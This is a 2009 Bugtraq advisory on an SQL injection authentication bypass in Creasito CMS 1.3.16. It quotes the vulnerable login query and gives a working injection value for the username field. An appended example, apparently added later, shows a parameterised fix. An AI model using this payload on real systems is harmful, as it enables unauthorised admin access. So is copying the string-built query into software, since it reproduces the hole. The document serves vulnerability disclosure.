
Bugtraq mailing list archives
Creasito e-commerce content manager Authentication Bypass
From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx () gmail com>
Date: Mon, 20 Apr 2009 17:08:20 +0200
******* Salvatore "drosophila" Fresta *******

[+] Application: creasito e-commerce content manager
[+] Version: 1.3.16
[+] Website: http://creasito.bloghosteria.com
[+] Bugs: [A] Authentication Bypass
[+] Exploitation: Remote
[+] Date: 20 Apr 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx () gmail com

*************************************************

[+] Menu

1) Bugs
2) Code
3) Fix

*************************************************

[+] Bugs

This cms is entirely vulnerable to SQL Injection.
I decided to post authentication bypass security
flaw only.

- [A] Authentication Bypass

[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: admin/checkuser.php, checkuser.php

SQL Injection bug allows a guest to bypass the
authentication system. The following is the
vulnerable code:

...
$username = $_POST['username'];
...
$sql = mysql_query("SELECT * FROM amministratore WHERE
username='$username' AND password='$password' AND activated='1'");
...

*************************************************

[+] Code

- [A] Authentication Bypass

Username: -1' OR '1'='1'#
Password: foo

*************************************************

[+] Fix

No fix.

*************************************************

--
Salvatore "drosophila" Fresta
CWNP444351
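A hardened form of the login check quoted in the advisory, as an added example that is not part of the original post or of Creasito's code. The table and column names come from the advisory's query; the `check_user` function, the PDO connection, the in-memory SQLite database and the `password_hash()` storage scheme are assumptions made for illustration.

```php
<?php
// Added example, not Creasito code. Table/column names are from the
// advisory's query; everything else here is a hypothetical illustration.

function check_user(PDO $db, string $username, string $password): bool
{
    // Assumption: passwords are stored with password_hash(). A dummy hash
    // is verified when no row matches so both paths do similar work.
    static $dummy = null;
    $dummy ??= password_hash('placeholder', PASSWORD_DEFAULT);

    // Placeholders keep user input out of the SQL text, so quotes and
    // comment characters in $username are compared as literal data.
    $stmt = $db->prepare(
        "SELECT password FROM amministratore
         WHERE username = :username AND activated = '1'"
    );
    $stmt->execute([':username' => $username]);
    $hash = $stmt->fetchColumn();   // false when no row matches

    $found = is_string($hash);
    $ok = password_verify($password, $found ? $hash : $dummy);
    return $found && $ok;
}

// Constructed sample data so the check runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE amministratore (
    username TEXT PRIMARY KEY, password TEXT, activated TEXT)");
$ins = $db->prepare("INSERT INTO amministratore VALUES (?, ?, '1')");
$ins->execute(['admin', password_hash('correct horse', PASSWORD_DEFAULT)]);

// The advisory's input is now only a username that does not exist.
var_dump(check_user($db, "-1' OR '1'='1'#", 'foo'));
// Wrong password for a real account, then the correct one.
var_dump(check_user($db, 'admin', 'wrong'));
var_dump(check_user($db, 'admin', 'correct horse'));
```

Because the query text is fixed before any input is bound, the result no longer depends on the `magic_quotes_gpc` setting listed under Requisites.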
